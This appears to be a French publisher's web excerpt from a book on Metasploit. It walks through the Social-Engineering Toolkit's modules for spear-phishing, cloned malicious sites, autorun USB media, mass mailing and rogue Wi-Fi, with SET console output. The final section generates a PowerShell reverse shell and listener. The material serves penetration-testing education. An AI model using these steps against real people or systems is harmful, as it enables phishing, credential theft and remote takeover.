Blog ENI : Toute la veille numérique !
🐠 -25€ dès 75€ 
+ 7 jours d'accès à la Bibliothèque Numérique ENI. Cliquez ici
Accès illimité 24h/24 à tous nos livres & vidéos ! 
Découvrez la Bibliothèque Numérique ENI. Cliquez ici
  1. Livres et vidéos
  2. Metasploit
  3. SET
Extrait - Metasploit Testez la sécurité de vos infrastructures (2e edition)
Extraits du livre
Metasploit Testez la sécurité de vos infrastructures (2e edition)
1 avis
Revenir à la page d'achat du livre

SET - Social-Engineering Toolkit

Présentation du Social-Engineering Toolkit

SET est un logiciel développé en Python proposant plusieurs fonctions afin d’abuser des techniques de social engineering. Le social engineering fait référence à des techniques de manipulation de l’être humain.

root@kali:~# setoolkit  
 
          ..######..########.########  
          .##....##.##..........##...  
          .##.......##..........##...  
          ..######..######......##...  
          .......##.##..........##...  
          .##....##.##..........##...  
          ..######..########....##...  
 
[---]        The Social-Engineer Toolkit (SET)         [---]  
[---]        Created by: David Kennedy (ReL1K)         [---]  
                     Version: 7.7.9  
                  Codename: 'Blackout'  
[---]        Follow us on Twitter: @TrustedSec         [---]  
[---]        Follow me on Twitter: @HackingDave        [---]  
[---]    ...

Spear-Phishing Attack Vectors

La rubrique Spear-Phishing Attack Vectors permet de réaliser des attaques de type spear-phishing. À la différence des attaques de phishing classiques, le spear-phishing se distingue par la personnalisation du message grâce à des informations obtenues auparavant.

set> 1  
 
The Spearphishing module allows you to specially craft email 
messages and send them to a large (or small) number of people 
with attached fileformat malicious payloads. If you want to spoof 
your email address, be sure "Sendmail" is installed (apt-get 
install sendmail) and change the config/set_config SENDMAIL=OFF 
flag to SENDMAIL=ON.  
 
There are two options, one is getting your feet wet and letting 
SET do  
everything for you (option 1), the second is to create your own 
FileFormat payload and use it in your own attack. Either way, good 
luck and enjoy!  
 
  1) Perform a Mass Email Attack  
  2) Create a FileFormat Payload  
  3) Create a Social-Engineering Template  
 
 99) Return to Main Menu 

Website Attack Vectors

La rubrique Website Attack Vectors permet de mettre en place un site web malveillant dans le but d’exploiter une vulnérabilité au sein du navigateur de la victime ou bien de jouer de social engineering pour que la victime réalise une action permettant à l’attaquant de prendre le contrôle de la machine à distance :

set> 2  
 
  1) Java Applet Attack Method  
  2) Metasploit Browser Exploit Method  
  3) Credential Harvester Attack Method  
  4) Tabnabbing Attack Method  
  5) Web Jacking Attack Method  
  6) Multi-Attack Web Method  
  7) Full Screen Attack Method  
  8) HTA Attack Method  
 
 99) Return to Main Menu 

Ne pouvant pas faire un focus sur l’ensemble des vecteurs d’attaque, nous allons nous concentrer sur les deux premiers utilisant le framework Metasploit.

1. Java Applet Attack Method

Comme son nom le laisse envisager, la rubrique Java Applet Attack Method permet non seulement de créer une applet Java malveillante mais aussi de cloner un site web afin de rendre l’attaque particulièrement complexe à identifier :

1)Java Applet Attack Method  
2) Metasploit Browser Exploit Method  
3) Credential Harvester Attack Method  
4) Tabnabbing Attack Method  
5) Web Jacking Attack Method  
6) Multi-Attack Web Method  
7) Full...

Infectious Media Generator

La rubrique Infectious Media Generator permet de créer des fichiers autorun.inf à rajouter au sein des clés USB ou des CD/DVD ainsi qu’un payload Metasploit. Une fois la clé USB ou le CD/DVD inséré, l’autorun permet d’exécuter automatiquement la charge.

Sous Windows, les fichiers autorun.inf ne sont plus exécutés automatiquement et silencieusement depuis Windows Vista.

Le patch KB971029 permet également de limiter ces exécutions automatiques sur Windows XP.

Create a Payload and Listener

La rubrique Create a Payload and Listener permet de façon relativement simple de générer un payload et d’exécuter un listener au sein de Metasploit.

Ainsi, les actions suivantes permettent de créer un fichier malveillant exécutant un reverse Meterpreter :

set> 4 
 
1) Windows Shell Reverse_TCP               Spawn a command shell on 
victim and send back to attacker  
2) Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell 
on victim and send back to attacker  
3) Windows Reverse_TCP VNC DLL             Spawn a VNC server on victim 
and send back to attacker  
4) Windows Shell Reverse_TCP X64           Windows X64 Command Shell, 
Reverse TCP Inline  
5) Windows Meterpreter Reverse_TCP X64     Connect back to the 
attacker (Windows x64), Meterpreter  
6) Windows Meterpreter Egress Buster       Spawn a meterpreter shell 
and find a port home via multiple ports  
7) Windows Meterpreter Reverse HTTPS       Tunnel communication over 
HTTP using SSL and use Meterpreter  
8) Windows Meterpreter Reverse DNS         Use a hostname instead of 
an IP address and use Reverse Meterpreter  
9) Download/Run your Own Executable  ...

Mass Mailer Attack

Comme son nom le laisse présumer, la rubrique Mass Mailer Attack permet de faire du phishing en masse à destination d’une ou de plusieurs adresses. Ce module permet également d’insérer des liens et/ou fichiers malveillants au sein des e-mails envoyés.

set> 5  
 
  Social Engineer Toolkit Mass E-Mailer  
 
  There are two options on the mass e-mailer, the first would  
  be to send an email to one individual person. The second option  
  will allow you to import a list and send it to as many people as  
  you want within that list.  
 
  What do you want to do:  
 
   1.  E-Mail Attack Single Email Address  
   2.  E-Mail Attack Mass Mailer  
 
   99. Return to main menu. 

Arduino-Based Attack Vector

La rubrique Arduino-Based Attack Vector permet de transformer un Arduino pour le programmer afin de réaliser des attaques physiques. Ces attaques physiques se basent sur le fait que ce type de périphérique est en mesure de se faire passer pour une souris ou un clavier et de contourner ainsi différentes mesures de protection. On parle en général d’USB HID (Human Interface Device) Attack.

Wireless Access Point Attack Vector

La rubrique Wireless Access Point Attack Vector permet de créer un faux point d’accès Wi-Fi grâce à la suite Aircrack-ng. En effet, grâce à Airbase-ng, AirMon-ng, DNSSpoof et dhcp3, SET va créer un point d’accès et redirige toutes les requêtes DNS vers la machine de l’attaquant. Il sera alors simplement nécessaire de rediriger les victimes vers une attaque vue précédemment.

QRCode Generator Attack Vector

Tout comme la rubrique Wireless Access Point Attack Vector, la rubrique QRCode Generator Attack Vector ne permet pas de réaliser d’attaques. Néanmoins, la génération d’un QRCode permet de camoufler des URL malveillantes :

set> 8  
The QRCode Attack Vector will create a QRCode for you with whatever 
URL you want.  
 
When you have the QRCode Generated, select an additional attack vector 
within SET and deploy the QRCode to your victim. For example, generate 
a QRCode of the SET Java Applet and send the QRCode via a mailer.  
 
Enter the URL you want the QRCode to go to (99 to exit): 
http://orhus.fr/  
 
[*] QRCode has been generated under 
/root/.set/reports/qrcode_attack.png 

Une fois généré, il ne reste plus qu’à transmettre le QRCode pointant vers une URL malveillante à une potentielle cible :

images/17EP02.png

Powershell Attack Vectors

Enfin, la rubrique Powershell Attack Vectors permet de créer un code malveillant en PowerShell afin que ce dernier soit exécuté sur un système de type Windows :

set> 9  
 
The Powershell Attack Vector module allows you to create PowerShell 
specific attacks. These attacks will allow you to use PowerShell which 
is available by default in all operating systems Windows Vista and 
above. PowerShell provides a fruitful landscape for deploying 
payloads and performing functions that  do not get triggered 
by preventative technologies.  
 
  1) Powershell Alphanumeric Shellcode Injector  
  2) Powershell Reverse Shell  
  3) Powershell Bind Shell  
  4) Powershell Dump SAM Database  
 
 99) Return to Main Menu 
 
set:powershell>2  
Enter the IPAddress or DNS name for the reverse host: 192.168.171.152 
set:powershell> Enter the port for listener [443]: 443  
[*] Rewriting the powershell reverse shell with options  
[*] Exporting the powershell stuff to /root/.set/reports/powershell 
 
set> Do you want to start a listener [yes/no]: yes 
 
Listening on 0.0.0.0:443 

Dans ce cas de figure, le reverse shell en PowerShell se trouve au sein du fichier /root/.set/reports/powershell/powershell.reverse.txt qu’il ne reste plus qu’à déposer et exécuter...